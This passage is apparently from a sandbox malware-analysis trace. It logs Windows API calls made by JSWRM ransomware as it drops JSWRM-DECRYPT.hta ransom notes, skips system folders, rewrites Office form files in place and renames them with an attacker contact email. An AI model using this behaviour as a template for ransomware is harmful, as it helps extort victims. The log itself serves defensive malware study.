lpUsedDefaultChar=0x0) returned 5 [0129.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.726] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.727] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0129.728] CloseHandle (hObject=0x45c) returned 1 [0129.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\jswrm-decrypt.hta")) returned 0x20 [0129.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43fb24b7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x232040 [0129.728] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.728] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43fb24b7, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.728] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.728] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.728] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0129.728] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0129.728] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0129.728] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0129.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.732] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.733] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0129.733] CloseHandle (hObject=0x238) returned 1 [0129.734] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\jswrm-decrypt.hta")) returned 0x20 [0129.734] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43fd849e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName=".", cAlternateFileName="")) returned 0x232080 [0129.734] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.734] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeff0bc27, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43fd849e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="..", cAlternateFileName="")) returned 1 [0129.734] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.734] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.734] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="ACTIVITL.ICO", cAlternateFileName="")) returned 1 [0129.734] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2=".") returned 1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="..") returned 1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="...") returned 1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="windows") returned -1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="recovery") returned -1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="perflogs") returned -1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="documents and settings") returned -1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="system volume information") returned -1 [0129.735] lstrcmpiW (lpString1="ACTIVITL.ICO", lpString2="msocache") returned -1 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activitl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.736] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.736] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.738] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.738] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.738] CloseHandle (hObject=0x314) returned 1 [0129.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activitl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activitl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.739] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="ACTIVITS.ICO", cAlternateFileName="")) returned 1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2=".") returned 1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="..") returned 1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="...") returned 1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="windows") returned -1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="recovery") returned -1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="perflogs") returned -1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="documents and settings") returned -1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="system volume information") returned -1 [0129.739] lstrcmpiW (lpString1="ACTIVITS.ICO", lpString2="msocache") returned -1 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activits.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.740] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.740] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.740] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.742] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.742] CloseHandle (hObject=0x314) returned 1 [0129.742] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activits.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activits.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.744] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3c8, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="ACTIVITY.CFG", cAlternateFileName="")) returned 1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2=".") returned 1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="..") returned 1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="...") returned 1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="windows") returned -1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="recovery") returned -1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="perflogs") returned -1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="documents and settings") returned -1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="system volume information") returned -1 [0129.744] lstrcmpiW (lpString1="ACTIVITY.CFG", lpString2="msocache") returned -1 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITY.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITY.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITY.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITY.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIVITY.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIVITY.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activity.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.745] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=968) returned 1 [0129.745] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.745] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x3c0, lpOverlapped=0x0) returned 1 [0129.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.747] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x3c0, lpOverlapped=0x0) returned 1 [0129.747] CloseHandle (hObject=0x314) returned 1 [0129.747] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITY.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activity.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\ACTIVITY.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\activity.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.748] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x315, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="APPT.CFG", cAlternateFileName="")) returned 1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2=".") returned 1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="..") returned 1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="...") returned 1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="windows") returned -1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="recovery") returned -1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="perflogs") returned -1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="documents and settings") returned -1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="system volume information") returned -1 [0129.748] lstrcmpiW (lpString1="APPT.CFG", lpString2="msocache") returned -1 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPT.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPT.CFG", cchWideChar=8, lpMultiByteStr=0x345e870, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPT.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPT.CFG", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="APPT.CFG", cchWideChar=8, lpMultiByteStr=0x345e840, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPT.CFG", lpUsedDefaultChar=0x0) returned 8 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.749] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appt.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.750] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=789) returned 1 [0129.750] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.750] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x310, lpOverlapped=0x0) returned 1 [0129.752] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.752] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x310, lpOverlapped=0x0) returned 1 [0129.752] CloseHandle (hObject=0x314) returned 1 [0129.753] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\APPT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\appt.cfg"), lpNewFileName="C:\\Program Files\\Microsoft 